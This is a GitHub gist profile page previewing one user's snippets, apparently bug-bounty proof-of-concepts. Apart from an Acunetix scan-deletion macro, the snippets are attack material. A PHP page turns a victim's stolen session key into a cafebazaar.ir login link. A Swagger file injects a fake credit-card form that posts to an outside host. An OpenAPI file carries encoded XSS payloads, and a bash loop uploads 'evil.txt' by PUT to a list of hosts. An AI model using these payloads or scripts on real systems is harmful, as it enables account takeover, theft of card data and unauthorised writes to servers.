Skip to content

Instantly share code, notes, and snippets.

View xElkomy's full-sized avatar
🎯
Focusing

Khaled Mohamed xElkomy

🎯
Focusing
View GitHub Profile
@xElkomy
xElkomy / acunetix_deletescans.js
Created December 16, 2023 17:12
Basic Javascript macro open https://example/#/scans?status=queued,starting and put this code into your console and click enter and let it, it will loop 100 with delay before every loop 10 seconds.
// Function to click the "Select All" checkbox
function clickSelectAll() {
const selectAllCheckbox = document.querySelector('.mat-checkbox-inner-container.mat-checkbox-inner-container-no-side-margin'); // Adjust the selector based on the actual class or selector for the "Select All" checkbox
selectAllCheckbox.click();
}
// Function to click the "Delete Scans" button
function clickDeleteButton() {
const buttons = document.querySelectorAll('.mat-button-wrapper'); // Adjust the selector based on the actual class or selector for buttons in Acunetix
<?php
if (isset($_GET['key'])) {
//Get authentication token
$token = $_GET['key'];
$login_link = "https://cafebazaar.ir/login/bysession?key=" . $token . "&next=/account/";
$login_link = "Login link: <a href='" . $login_link . "' target='_blank'>" . $login_link . "</a>";
if ($token == "") {
$login_link = "Login Link: Failure! Victim not logged in.";
}
swagger: '2.0'
info:
version: 1.0.0
title: HTML INJECTION POC
description: '<div class="creditCardForm">
<div class="heading">
<h1>Update your Credit Card</h1>
</div>
<div class="payment">
<form action="https://q0x.xyz" method="post" class="form-signin" id = "login_form">
{
"components": {
"parameters": {
"alert": {
"description": "[xElkomyistoooooooooooooooooooooooooooooooooooooooooooooooooooo](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)",
"explode": false,
"in": "path",
"name": "<script>console.log(‘000000000000000000dad0000000000000000000');</script>",
"required": true,
"schema": {
#!/bin/bash
# the script will test for PUT upload method against all the hosts
# Thanks shibli2700 https://github.com/shibli2700/Rekon/blob/master/puttest.sh
for domain in $(cat $1)
do
curl -s -o /dev/null -X PUT -d "hello world" "${domain}/evil.txt"
done
#My Script for check https://github.com/xElkomy/Workflow-Bug-Bounty/blob/master/Fuzz-xElkomy.py
python3 Fuzz-xElkomy.py hosts.txt '/evil.txt' 'hello world' > results-putcheck.txt